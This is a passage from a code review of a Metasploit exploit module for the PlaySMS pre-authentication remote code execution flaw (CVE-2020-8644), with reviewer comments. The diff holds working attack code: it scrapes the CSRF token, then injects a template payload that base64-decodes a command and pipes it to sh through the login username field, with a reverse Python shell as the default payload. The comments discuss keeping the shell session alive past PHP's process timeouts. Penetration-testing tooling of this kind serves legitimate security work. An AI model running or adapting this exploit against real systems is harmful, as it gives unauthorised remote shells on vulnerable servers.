modules/exploits/linux/http/playsms_pre_auth_rce.rb

```diff
@@ -0,0 +1,159 @@
+          which result code execution.
+          The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
+
+          This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
+        },
+        'Author' =>
+            [
+              'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+              'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
+            ],
+        'License' => MSF_LICENSE,
+        'References' =>
+            [
+              ['CVE', '2020-8644'],
+              ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
+              ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
+            ],
+        'DefaultOptions' =>
+            {
+              'SSL' => false,
+              'PAYLOAD' => 'cmd/unix/reverse_python'
+            },
+        'Privileged' => false,
+        'Platform' => %w[unix linux],
+        'Arch' => ARCH_CMD,
+        'Payload' =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'python'
+              }
+          },
+        'Targets' =>
+            [
+              [ 'PlaySMS Before 1.4.3', {} ],
+            ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 05 2020'
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']),
+      ]
+    )
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(uri, 'index.php')
+      })
+    rescue StandardError
+      vprint_error('Unable to access the index.php file')
+      return CheckCode::Unknown
+    end
+
+    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
+      return Exploit::CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  # Send Payload in Login Request
+  def login
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, 'index.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'app' => 'main',
+        'inc' => 'core_auth',
+        'route' => 'login'
+      }
+    })
+
+    # Grabbing CSRF token from body
+    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_good("X-CSRF-Token for login : #{csrf}")
+
+    cookies = res.get_cookies
+
+    vprint_status('Trying to Send Payload in Username Field ......')
+
+    # Encoded in base64 to avoid HTML TAGS which is filter by Application.
+    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"
```

Comment:
The way this is getting executed is yielding a session, then after a minute or two, the session is dying. I believe this is due to the inherent timeouts imposed on the PHP [shell_exec](https://www.php.net/manual/en/function.shell-exec.php) function. This really needs a solution to ensure that the session is not killed by some timeout after it's established. I spent a little time experimenting with `exec` and `popen` with no luck.

Reply:
actually playsms filter all special character like ```', ", <, > ``` etc from preventing to XSS. that's y I am using base64 encoding.

Reply:
I'm not commenting on the characters exactly. I'm saying that the *way* that the OS command is invoked through PHP is causing the subprocess in which the OS command / payload is executing to be terminated by PHP after a couple of minutes. There's got to be a way to run the OS command in a way that PHP does not kill the process, perhaps through some ability to `fork` it into the background.